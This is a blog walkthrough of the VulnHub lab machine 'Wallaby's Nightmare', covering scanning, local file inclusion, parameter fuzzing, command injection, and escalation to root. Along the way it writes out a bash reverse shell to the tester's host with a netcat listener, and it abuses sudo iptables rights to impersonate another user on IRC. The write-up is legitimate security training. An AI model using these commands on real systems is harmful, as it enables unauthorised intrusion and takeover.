18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Wallaby's: Nightmare

Location

https://download.vulnhub.com/wallabys/wallabysnightmare.rar

Introduction

Level: beginner-intermediate
This is the first boot2root machine created by Waldo.
It’s the first part in a two part series. The creator was inspired by many VM’s from vulnhub.com and made this with different attack vectors. The machine will respond on how the ‘intruder’ tries to get in. Make a wrong move and some stuff gets moved around and makes the machine more difficult!
It was created for educational purposes and so people can have a little fun testing their skills in a legal, pentest lab environment.
Scenario: The intruder is breaking into a fictional characters server (named Wallaby) and tries to gain root without him noticing, or else the difficulty level will increase if you make the wrong move!

Getting Started

First I run a nmap scan to discover any open ports.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 13:37 CET
Nmap scan report for 192.168.171.4
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_ 256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
6667/tcp filtered irc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds

My first stop is the SSH server for some banner grabbing.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.4 -p 22
The authenticity of host '192.168.171.4 (192.168.171.4)' can't be established.
ECDSA key fingerprint is SHA256:nRDXRBPtapHeG1jqIbacovukdKPIveFVy1GE8kntdU4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.171.4' (ECDSA) to the list of known hosts.
n13mant@192.168.171.4's password:

No useful banner here. Onward to the webserver.



Things are getting serious!
In the URL they made use of a parameter. When I change the parameter I get access to ‘/etc/passwd’.

Looks like there are two users: “walfin” and “steven?”.

Looks like this vector is gone. After another nmap scan it seems that port 80 is closed and another port has opened which runs the webserver.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 14:04 CET
Nmap scan report for 192.168.171.4
Host is up (0.00094s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_  256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
6667/tcp  filtered irc
60080/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds


Let’s see if the previous vulnerability is still active.

Looks like the LFI vulnerability still exists. Or so I thought.

Guess I’m being trolled here. Time for finding a new vector.
Because dirb wasn’t getting me anywhere I tried Wfuzz.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $wfuzz -c -z file,/usr/share/wordlists/openwordlist/language/english/lower.lst --hc 404 --hw 87 http://192.168.171.4:60080/?page=FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************
Target: http://192.168.171.4:60080/?page=FUZZ
Total requests: 390532
==================================================================
ID	Response   Lines      Word         Chars          Request
==================================================================
37084:  C=200     27 L	     106 W	    994 Ch	  "blacklist"
..."
69281:  C=200     26 L	      86 W	    895 Ch	  "contact"
..."
147277:  C=200     30 L	     115 W	   1147 Ch	  "home"
..."
158165:  C=200     38 L	     150 W	   1362 Ch	  "index"
..."
186261:  C=200     29 L	     102 W	   1085 Ch	  "mailer"
-----SNIP-----

After checking some pages I got to the last one on my list which was the most promising one.


<!--a href='/?page=mailer&mail=mail wallaby "message goes here"'><button type='button'>Sendmail</button-->
    <!--Better finish implementing this so N13manT
 can send me all his loser complaints!-->

The parameter, commented in the source code, was vulnerable to arbitrary code execution.

Because it will be much easier to recon the system with a shell, I use a bash command to create a reverse shell.

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"

Which I need to URL encode.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 37744
bash: cannot set terminal process group (1074): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html$
www-data@ubuntu:/var/www/html$ ls -lah /home
ls -lah /home
total 20K
drwxr-xr-x  5 root    root    4.0K Dec 16 15:44 .
drwxr-xr-x 22 root    root    4.0K Dec 14 19:24 ..
drwxr-xr-x  5 ircd    ircd    4.0K Dec 16 15:28 ircd
drwxr-xr-x  5 waldo   waldo   4.0K Dec 16 16:51 waldo
drwxr-xr-x  8 wallaby wallaby 4.0K Dec 16 16:02 wallaby

Look like there are 2 users and a IRC-bot.

www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

It seems I have some sudo rights. For instance, I can change the firewall rules.

www-data@ubuntu:/$ sudo iptables -S
sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6667 -j DROP

There is a rule that drops packets on port 6667. When I check my notes I see that there is a filtered port 6667 in my nmap scan 6667/tcp filtered irc.

www-data@ubuntu:/$ netstat -anp | grep "LISTEN"
netstat -anp | grep "LISTEN"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::60080                :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

After checking the networking it seems there is running an IRC local.

www-data@ubuntu:/$ dpkg -l
dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version      Architecture Description
+++-==============-============-============-=================================
-----SNIP-----
ii  irssi          0.8.19-1ubun amd64        terminal based IRC client
-----SNIP-----
www-data@ubuntu:/home/waldo$ ./irssi.sh
./irssi.sh
no server running on /tmp/tmux-33/default

At first I tried to use a IRC client on the remote machine, but that didn’t work. So because I can alter the firewall rules I can try to flush the iptable and connect with the IRC port from my own machine.


After a few tries I get a channel with an user  Waldo and a bot.

With IRC there is an option to show the list of custom commands, because /help was an option for HexChat itself. The option is  .help.


Oh oh……busted! So it knows I’m not Waldo. I need to get Waldo out of the chatroom and replace myself with the waldo username. But how? I’ve tried the kick/ban options on this side. Didn’t work. So I need to deny its access from the other side……back to the firewall rules.

www-data@ubuntu:/home/wallaby$ id waldo
id waldo
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

To set the correct rule I checkout a site which provides me with the answer I was seeking.

www-data@ubuntu:/home/wallaby$ sudo iptables -I OUTPUT -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP
<T -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP
www-data@ubuntu:/home/wallaby$ sudo iptables -L
sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             anywhere             owner UID match waldo tcp dpt:ircd

After a while waldo is gone……..the king is dead, long live the king!
With the  /nick command I change my nickname to ‘waldo’ and assume his place.

Time for another reverse shell. I use the same as before, but this time change the portnumber to 1337.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 60128
bash: cannot set terminal process group (699): Inappropriate ioctl for device
bash: no job control in this shell
wallaby@ubuntu:~$ id
id
uid=1001(wallaby) gid=1001(wallaby) groups=1001(wallaby),4(adm)
wallaby@ubuntu:~$

After this it was easy obtaining root.

wallaby@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
wallaby@ubuntu:~$ sudo su -
sudo su -
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls -lah
ls -lah
total 48K
drwx------  4 root root 4.0K Dec 27 19:31 .
drwxr-xr-x 22 root root 4.0K Dec 14 19:24 ..
drwxr-xr-x  2 root root 4.0K Dec 27 11:27 backups
-rw-------  1 root root    1 Dec 27 12:26 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root  510 Dec 27 19:31 check_level.sh
-rw-r--r--  1 root root  342 Dec 16 16:52 flag.txt
-rw-------  1 root root   18 Dec 15 13:03 .mysql_history
drwxr-xr-x  2 root root 4.0K Dec 15 13:10 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec 15 17:50 .selected_editor
-rw-r--r--  1 root root  214 Dec 16 17:09 .wget-hsts
root@ubuntu:~# cat flag.txt
cat flag.txt
###CONGRATULATIONS###
You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!
This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!
Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.
Thanks guys!
-Waldo

Conclusion

This challenge was fun to do. The difficulty level didn’t change that much and after the first moment of being “caught” there wasn’t really a game changer. The machine did feel a bit “buggy” when I was trying to execute an arbitrary command and the system didn’t responded. After a reset of the machine and following the exact same steps I was able to get a better and smoother experience.
Thanks Waldo for making this VM. Hope to see more of your work in the near future.
 
 
 
 
 

2 thoughts on “Wallaby's: Nightmare

  1. I have doubt in the IP you start to Nmap!
    How you got this IP Address 192.168.171.4
    Sorry, I’m totally new to this field, please help

    1. Hi Yash,
      192.168.171.4 was assigned by the dhcp server.
      This is not an external IP address. So if you try to scan the same IP, you won’t get any good result.
      When you run the image on your VMware or Vbox it will get its own IP address. You can set the IP range yourself in the settings of your VM software.
      Good luck.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.